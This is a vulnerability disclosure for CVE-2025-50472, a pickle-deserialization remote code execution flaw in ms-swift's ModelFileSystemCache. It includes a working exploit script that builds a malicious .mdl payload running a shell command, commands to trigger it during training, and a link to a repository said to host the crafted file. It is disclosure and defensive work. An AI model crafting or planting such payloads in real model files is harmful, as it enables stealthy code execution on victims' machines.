# CVE-2025-50472
## ModelScope Ms-Swift ModelFileSystemCache Deserialization of Untrusted Data Remote Code Execution Vulnerability

### RCE PoC
I uploaded a code repository containing a malicious .mdl file to ModelScope for testing purposes. It can be used directly during testing. The link is:
https://www.modelscope.cn/models/HaoFan2024/ms-swift-test-fanhao/files

<img width="1920" height="885" alt="image" src="https://github.com/user-attachments/assets/5b1095d6-508b-4bf9-95df-459eb35a6b88" />

> The .mdl file contains embedded malicious code, but no security warning is displayed on ModelScope.

PoC Code：
```
# Set up the environment
pip install ms-swift==2.6.1
pip install -r framework.txt # This requirements file is included in the modelscope/ms-swift repository
# When using the remote repository HaoFan2024/ms-swift-test-fanhao, the `.mdl` file will be downloaded directly.
# During model loading, the `.mdl` file is loaded using `pickle.load`, leading to Remote Code Execution (RCE).
CUDA_VISIBLE_DEVICES=0 swift sft \
    --model_type qwen1half-0_5b-chat \
    --model_id_or_path=HaoFan2024/ms-swift-test-fanhao \
    --dataset blossom-math-zh \
    --num_train_epochs 5 \
    --sft_type lora \
    --output_dir output \
    --eval_steps 200
```

The procedure for reproducing the issue is as follows:

1. The model is downloaded
<img width="1526" height="396" alt="p1" src="https://github.com/user-attachments/assets/97a59cd7-29f9-4c5c-ac9a-ef8b39ff4c27" />

2. After the malicious code is executed, training proceeds normally without interruption
<img width="1516" height="800" alt="image" src="https://github.com/user-attachments/assets/4dc87173-2dd2-4073-b384-337de131f6a0" />

3. The malicious payload is successfully executed
<img width="269" height="39" alt="image" src="https://github.com/user-attachments/assets/f51d5a29-3a35-43c0-8720-2f6c95d90b07" />

### 1. High-level overview and effects of the vulnerability:
The modelscope/ms-swift library thru 2.6.1 is vulnerable to arbitrary code execution through deserialization of untrusted data within the `load_model_meta()` function of the `ModelFileSystemCache()` class. Attackers can execute arbitrary code and commands by crafting a malicious serialized `.mdl` payload, exploiting the use of `pickle.load()` on data from potentially untrusted sources. This vulnerability allows for remote code execution (RCE) by deceiving victims into loading a seemingly harmless checkpoint during a normal training process, thereby enabling attackers to execute arbitrary code on the targeted machine. 

__Note that the payload file is a hidden file, making it difficult for the victim to detect tampering. More importantly, during the model training process, after the `.mdl` file is loaded and executes arbitrary code, the normal training process remains unaffected meaning the user remains unaware of the arbitrary code execution.__

### 2. The Vulnerable Product
- Product: modelscope ms-swift
- Module: ModelFileSystemCache
- File: swift/hub/utils/caching.py
- Version: <=2.6.1
- GitHub Permalink: https://github.com/modelscope/ms-swift/blob/ab38bff0387a86fd9f068246c326ee7b0d5ed139/swift/hub/utils/caching.py#L141

### 3. Root Cause Analysis
- Detailed description of the vulnerability: The vulnerability results from unsafe deserialization of untrusted data. The script uses `pickle.load` to load the hidden cache file and is vulnerable to code execution.

- Code flow from input to the vulnerable condition:
    - During model training, the user employed the default model downloading method to obtain a model from ModelScope. The model was stored under the path `~/.cache/modelscope/hub/xx/xx`, where a `.mdl` cache file was present in the model directory, containing basic information such as the model name.
    - The user then utilized the downloaded model for fine-tuning or other training procedures.
    - When the `caching.py` script deserialized the `.mdl` file, malicious code embedded in the file was executed.
- Injection point: The vulnerability occurs at the point where pickle.load is called.
GitHub Permalink: https://github.com/modelscope/ms-swift/blob/ab38bff0387a86fd9f068246c326ee7b0d5ed139/swift/hub/utils/caching.py#L141

- Suggested fixes: When handling configuration files (rather than model files), it is recommended to adopt safer file parsing methods, such as `yaml.safe_load(yaml_file)` or `json.load`, to mitigate the risk of arbitrary code execution.

### 4. PoC
1. Run `exploit.py` to create a malicious cache file `.mdl` that will create a directory on the victim’s system:
```
# exploit.py

import pickle  
import os   
  
class Exploit:  
    def __reduce__(self):  
        return (os.system, ('mkdir HACKED',))  

# .mdl
data = pickle.dumps(Exploit())
with open('.mdl', 'wb') as f:
    f.write(data)
```

2. Replace the original `.mdl` file in the model directory with the maliciously crafted file generated above.

3. When the `model_id_or_path` parameter is specified during training to reference a local model directory, a tampered `.mdl` file in the specified path can result in remote code execution (RCE).
__Importantly__, such modification does not disrupt the normal training workflow, rendering the RCE attack stealthy and difficult for users to detect.
```
CUDA_VISIBLE_DEVICES=0 swift sft     --model_type qwen1half-0_5b-chat --model_id_or_path=/root/.cache/modelscope/hub/qwen/Qwen1___5-0___5B-Chat     --dataset blossom-math-zh     --num_train_epochs 5     --sft_type lora     --output_dir output     --eval_steps 200
```

### Author
Hao Fan(凡浩) and Yu Rong(戎誉)
